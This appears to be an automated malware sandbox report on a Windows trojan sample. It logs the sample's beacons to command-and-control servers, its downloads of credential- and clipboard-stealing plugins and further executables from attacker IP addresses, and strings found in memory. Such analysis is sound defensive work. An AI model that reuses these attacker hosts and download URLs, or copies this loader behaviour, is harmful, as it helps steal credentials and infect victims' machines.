Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49709 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_00B8D8D0 recv,recv,recv,recv, 0_2_00B8D8D0
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YVSahsnONFm9PMs&MD=We8PUgeO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YVSahsnONFm9PMs&MD=We8PUgeO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=480920124&timestamp=1713490161736 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jRQWsnrOSN4; VISITOR_INFO1_LIVE=uxbWyiEqJyc; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgJw%3D%3D
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: GET /mine/amert.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /lend/build12.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /lend/build12.exe HTTP/1.1Host: 193.233.132.167If-Modified-Since: Fri, 19 Apr 2024 00:20:52 GMTIf-None-Match: "6621b8e4-17e00"
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.167
Source: 831840b410.exe, 0000001F.00000003.3234149280.0000000004060000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000002.3243043765.0000000004062000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3237964866.0000000004062000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/accountfmF( equals www.youtube.com (Youtube)
Source: 831840b410.exe, 00000010.00000003.3105319797.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3102067403.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/accountp equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001C.00000003.3043589855.0000000007CB2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3032607881.0000000007CC7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3047846067.0000000007DD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Khttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKJqaiC2kMEiuCgpI4CDA9zdQR9Ma_4VO4V4SsWE5FBoZnSBBlUHdjOISz2jXF92hxTK-U9yBg equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001D.00000003.3039143770.00000000079EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKLYPILSqGGJxF99XUM7ry_ZpWfAteaIP49LuGs_pX6vyTY-I4NhOGVeIl3pV2a7zJNZmB6a&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-284379341%3A1713490158071679&theme=mn&ddm=0 equals www.youtube.com (Youtube)
Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3237599781.0000000003FB4000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3207722657.0000000003FB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account7 equals www.youtube.com (Youtube)
Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountA equals www.youtube.com (Youtube)
Source: 831840b410.exe, 00000010.00000002.3120738750.0000000003858000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountJ equals www.youtube.com (Youtube)
Source: 831840b410.exe, 00000010.00000003.3086222866.0000000003789000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3110190311.00000000037C9000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 00000010.00000003.3087346454.00000000037C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountL equals www.youtube.com (Youtube)
Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountM) equals www.youtube.com (Youtube)
Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountT) equals www.youtube.com (Youtube)
Source: 831840b410.exe, 0000002F.00000003.3477995978.00000000040EE000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000002F.00000003.3475843478.00000000040CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account[C equals www.youtube.com (Youtube)
Source: 831840b410.exe, 0000001F.00000002.3242965392.0000000004034000.00000004.00000020.00020000.00000000.sdmp, 831840b410.exe, 0000001F.00000003.3235541239.0000000004034000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountd* equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: www.youtube.com
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 927sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"Content-Type: text/plain;charset=UTF-8sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"X-Goog-AuthUser: 0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://accounts.google.comX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=513=DL6Us8jAPrwCCKarlTw2RsBHsg-PZZE0_IVMLOmld8Vg4EMZhTyE_65f9B0OK-p44_4Uk-puC2a1J_sCfoJnyAtSeJNyRbiKB8AiKkQJAbADm2J1hujbY6LjrFBfHJLMH2_5Lm7sfqr7tbq8PbRvtYkxosEGP0PKBUVLfjHGngA
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.102:57893/hera/amadka.exe
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/go.exe
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/go.exe0.1
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/go.exeero
Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/go.exerisepro
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/lenin.exe
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/lenin.exe.eR
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/lenin.exe/
Source: rundll32.exe, 00000008.00000002.2871819933.000001E17AF1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php
Source: rundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2871819933.000001E17AE8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1
Source: rundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1E
Source: rundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1ame=
Source: rundll32.exe, 00000008.00000002.2874206472.000001E17CD57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/esI
Source: powershell.exe, 0000000B.00000002.2810399931.0000029EFCB80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: svchost.exe, 00000012.00000003.7080004981.0000014EABA8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000012.00000003.7080004981.0000014EABA63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.3611100512.0000014EAB782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dvwmczhfksazn5mwlykzsdqv6u_2024.3.27.0/go
Source: svchost.exe, 00000012.00000003.7080004981.0000014EABA63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/dvwmczhfksazn5mwlykzsdqv6u_2024.3.27.0
Source: svchost.exe, 00000012.00000003.2839947296.0000014EAB780000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000000B.00000002.2803800897.0000029E9006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2784637428.0000029E819C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2784637428.0000029E80228000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: c884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDp
Source: RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDpITpI
